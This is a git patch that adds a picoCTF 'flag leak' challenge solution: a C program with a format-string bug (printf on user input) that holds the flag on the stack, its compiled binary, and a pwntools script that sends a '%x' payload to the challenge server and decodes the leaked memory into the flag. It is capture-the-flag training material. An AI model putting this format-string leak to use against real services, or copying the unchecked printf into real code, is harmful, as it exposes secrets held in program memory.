From 284e776cd539da60af0234e2b260d3c9d0e785f3 Mon Sep 17 00:00:00 2001
From: THEON-1 <git@theon-1.de>
Date: Tue, 9 Dec 2025 11:58:45 +0100
Subject: [PATCH] flag leak

---
 flag_leak/.gdb_history |   2 ++
 flag_leak/sol.py       |  29 ++++++++++++++++++++++++++
 flag_leak/vuln         | Bin 0 -> 15876 bytes
 flag_leak/vuln.c       |  46 +++++++++++++++++++++++++++++++++++++++++
 4 files changed, 77 insertions(+)
 create mode 100644 flag_leak/.gdb_history
 create mode 100755 flag_leak/sol.py
 create mode 100755 flag_leak/vuln
 create mode 100644 flag_leak/vuln.c

diff --git a/flag_leak/.gdb_history b/flag_leak/.gdb_history
new file mode 100644
index 0000000..75553ce
--- /dev/null
+++ b/flag_leak/.gdb_history
@@ -0,0 +1,2 @@
+disassemble main
+exit
diff --git a/flag_leak/sol.py b/flag_leak/sol.py
new file mode 100755
index 0000000..044d519
--- /dev/null
+++ b/flag_leak/sol.py
@@ -0,0 +1,29 @@
+#!/usr/bin/env python
+from pwn import *
+
+buffer_size = 127
+hex_to_read = 127//2
+hex_reader = b'%x'*hex_to_read
+payload = hex_reader + b'.'
+log.info(f"payload: {payload}")
+
+def endian_swap(s, offset=0):
+    result = b''
+    for i in range(3+offset, len(s), 4):
+        result += bytes(reversed(s[i-3:i+1]))
+    return result
+
+conn = remote("saturn.picoctf.net", 65206)
+
+conn.recvuntil(b" >> ")
+conn.sendline(payload)
+conn.recvline()
+data = conn.recvline(keepends=False)[:-1]
+log.info(f"received data: {data}")
+unhexed_data = unhex(data)
+for i in range(4):
+    endian_swapped_data = endian_swap(unhexed_data, offset=i)
+    if b"picoCTF" in endian_swapped_data:
+        break
+log.info(f"processed data: {endian_swapped_data}")
+
diff --git a/flag_leak/vuln b/flag_leak/vuln
new file mode 100755
index 0000000000000000000000000000000000000000..666c7d1a41b03a6eae1b0f5d5854bf1edd4eab8d
GIT binary patch
literal 15876
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
Giv9~x9K#R*

literal 0
HcmV?d00001

diff --git a/flag_leak/vuln.c b/flag_leak/vuln.c
new file mode 100644
index 0000000..ca0491a
--- /dev/null
+++ b/flag_leak/vuln.c
@@ -0,0 +1,46 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <wchar.h>
+#include <locale.h>
+
+#define BUFSIZE 64
+#define FLAGSIZE 64
+
+void readflag(char* buf, size_t len) {
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'flag.txt' in this directory with your",
+                    "own debugging flag.\n");
+    exit(0);
+  }
+
+  fgets(buf,len,f); // size bound read
+}
+
+void vuln(){
+   char flag[BUFSIZE];
+   char story[128];
+
+   readflag(flag, FLAGSIZE);
+
+   printf("Tell me a story and then I'll tell you one >> ");
+   scanf("%127s", story);
+   printf("Here's a story - \n");
+   printf(story);
+   printf("\n");
+}
+
+int main(int argc, char **argv){
+
+  setvbuf(stdout, NULL, _IONBF, 0);
+  
+  // Set the gid to the effective gid
+  // this prevents /bin/sh from dropping the privileges
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+  vuln();
+  return 0;
+}